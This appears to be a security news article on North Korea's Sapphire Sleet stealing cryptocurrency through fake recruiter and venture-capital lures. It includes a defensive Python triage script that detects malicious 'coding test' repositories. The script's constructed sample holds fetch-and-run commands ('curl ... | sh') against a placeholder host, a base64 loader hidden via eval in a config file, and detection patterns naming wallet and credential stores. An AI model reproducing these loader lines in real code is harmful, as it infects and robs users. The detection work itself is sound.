
North Korea’s Sapphire Sleet Steals Over $10M in Cryptocurrency Through Fake Recruiter Scams

Cedric Nelson

The North Korean state-sponsored group Sapphire Sleet stole more than $10 million in cryptocurrency through social engineering campaigns run over a six-month period, according to Microsoft.

Tactics and Techniques

Sapphire Sleet, active since at least 2020 and overlapping with activity that other vendors track as APT38 and BlueNoroff, runs elaborate schemes against both individuals and businesses.

Fake Recruiters and Job Seekers on LinkedIn

The group creates fake LinkedIn profiles, posing as recruiters for well-known firms such as Goldman Sachs, and as job seekers. Once a target trusts the persona, they are directed to a "skills assessment" portal that the attackers control.

  1. The victim is given login credentials for the portal and told to download the code needed for the test; running that code silently installs malware.
  2. The malware gives the attackers access to credentials and cryptocurrency wallets on the victim's device.

Impersonating Venture Capitalists

In another tactic, the group poses as venture capitalists interested in the target's business and invites the victim to an online meeting. The meeting is staged to suffer "connection issues", and the victim is told to download and run a script that supposedly fixes them.

  1. The script installs malware on the victim's Windows or macOS device, giving the attackers a foothold for data theft.
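Both lures above end the same way: the victim runs code the attacker supplied, either a "skills test" repository or a one-off script to fix a broken call. The Python below is an added example, not Microsoft's detection logic and not code recovered from the campaign. It statically triages such a download before anything is executed, flagging base64 blobs that decode to code, remote fetches piped into a shell, and references to wallet or browser credential stores. The indicator patterns, file names and the sample repository it builds are constructed for the example.

```python
"""Static triage of an unsolicited 'coding test' repository or 'fix the call'
script before anyone runs it. Constructed example; the indicator list is an
assumption for illustration, not a published IOC set."""
import base64
import re
import tempfile
from pathlib import Path

# Behaviours worth a look in a supposed take-home test: executing decoded
# content, pulling remote content, spawning shells, touching wallet or
# browser credential stores, or setting up persistence.
PATTERNS = {
    "eval_or_exec": re.compile(r"\b(eval|exec|Function)\s*\("),
    "remote_fetch": re.compile(
        r"\b(curl|wget|Invoke-WebRequest|urlopen|requests\.get|fetch|axios)\b"),
    "shell_spawn": re.compile(
        r"(\b(child_process|subprocess|osascript|powershell)\b|os\.system|cmd\.exe|/bin/sh\b)"),
    "wallet_paths": re.compile(
        r"(MetaMask|Exodus|Electrum|Phantom|Local Extension Settings|Login Data|Keychain)", re.I),
    "persistence": re.compile(r"(LaunchAgents|CurrentVersion\\Run|crontab|schtasks)"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
SOURCE_EXT = {".js", ".ts", ".py", ".sh", ".ps1", ".vbs", ".json", ".rb"}


def decode_blobs(text):
    """Return the decoded form of long base64 runs that decode to printable text."""
    out = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            out.append(raw.decode("ascii"))
    return out


def scan_text(text):
    """Map indicator name -> sorted unique matches. Matches found inside decoded
    base64 blobs are keyed 'decoded:<name>', since loaders hide the payload there."""
    hits = {}
    for name, pat in PATTERNS.items():
        found = sorted({m.group(0) for m in pat.finditer(text)})
        if found:
            hits[name] = found
    for decoded in decode_blobs(text):
        for name, pat in PATTERNS.items():
            found = sorted({m.group(0) for m in pat.finditer(decoded)})
            if found:
                hits.setdefault("decoded:" + name, []).extend(found)
    return hits


def verdict(hits):
    """'block' for deliberately hidden code, wallet access, or fetch-and-run;
    'review' for anything else that matched; 'clean' when nothing did."""
    keys = set(hits)
    if any(k.startswith("decoded:") for k in keys) or "wallet_paths" in keys:
        return "block"
    if "remote_fetch" in keys and keys & {"shell_spawn", "eval_or_exec"}:
        return "block"
    return "review" if hits else "clean"


def scan_tree(root):
    """Scan every source-like file under root; return {relative path: (verdict, hits)}."""
    root = Path(root)
    results = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SOURCE_EXT:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                results[path.relative_to(root).as_posix()] = (verdict(hits), hits)
    return results


# Constructed sample "skills test" repository plus a "fix the call" script.
LOADER_PAYLOAD = 'require("child_process").exec("curl -s https://example.invalid/u | sh");'


def build_sample_repo():
    blob = base64.b64encode(LOADER_PAYLOAD.encode()).decode()
    files = {
        "src/index.js": 'const express = require("express");\nconst app = express();\n'
                        'app.get("/", (req, res) => res.send("ok"));\napp.listen(3000);\n',
        "server/config.js": "module.exports = { port: 3000 };\n"
                            "// reads like a config module; the behaviour is in the blob\n"
                            f'eval(Buffer.from("{blob}", "base64").toString());\n',
        "fix_connection.sh": "#!/bin/sh\n# 'run this to fix the video call' lure (constructed)\n"
                             "osascript -e 'do shell script \"curl -s https://example.invalid/fix | sh\"'\n",
    }
    root = Path(tempfile.mkdtemp(prefix="triage_"))
    for rel, text in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(text)
    return root


if __name__ == "__main__":
    for rel, (v, hits) in sorted(scan_tree(build_sample_repo()).items()):
        print(f"{v:6} {rel}: {hits}")
```

A static pass like this is a pre-execution check only: a loader that fetches its real payload at runtime shows up as nothing more than a remote fetch, which is why fetch-plus-shell alone is enough to block here. Anything an unsolicited contact asks you to run still belongs in a disposable VM with no wallets or saved credentials on it.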

Leveraging Technology to Deceive

Sapphire Sleet combines AI tools with conventional social engineering to make its personas convincing:

  1. AI-powered Faceswap: to alter stolen photos for use in professional-looking resumes and profiles.
  2. Voice-changing software: to make the personas sound authentic on calls.
  3. Organized financial tracking: records of illicit earnings from cryptocurrency theft and from IT work abroad.

North Korea’s IT Workers: A Triple Threat

Microsoft also highlights North Korean IT workers placed abroad, who contribute to the regime's economy by:

  1. Earning income: taking remote work found through LinkedIn and freelance platforms, with portfolios hosted on sites such as GitHub.
  2. Abusing access: stealing intellectual property from the companies that hire them.
  3. Extortion, including ransomware: turning the access gained under fake personas and bogus portfolios against their employers.

These workers rely on facilitators to create accounts and apply for remote jobs on their behalf, circumventing restrictions that prevent North Koreans from registering on platforms that require valid bank accounts and phone numbers.

Broader Implications

Microsoft emphasizes that these scams show the growing sophistication of North Korean cyber operations, which are a key source of revenue for a regime under international sanctions. The $370,000 that Microsoft saw tracked as IT worker earnings from fraudulent job applications is only one facet of a broader strategy that also covers cryptocurrency theft, ransomware attacks, and espionage.


© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067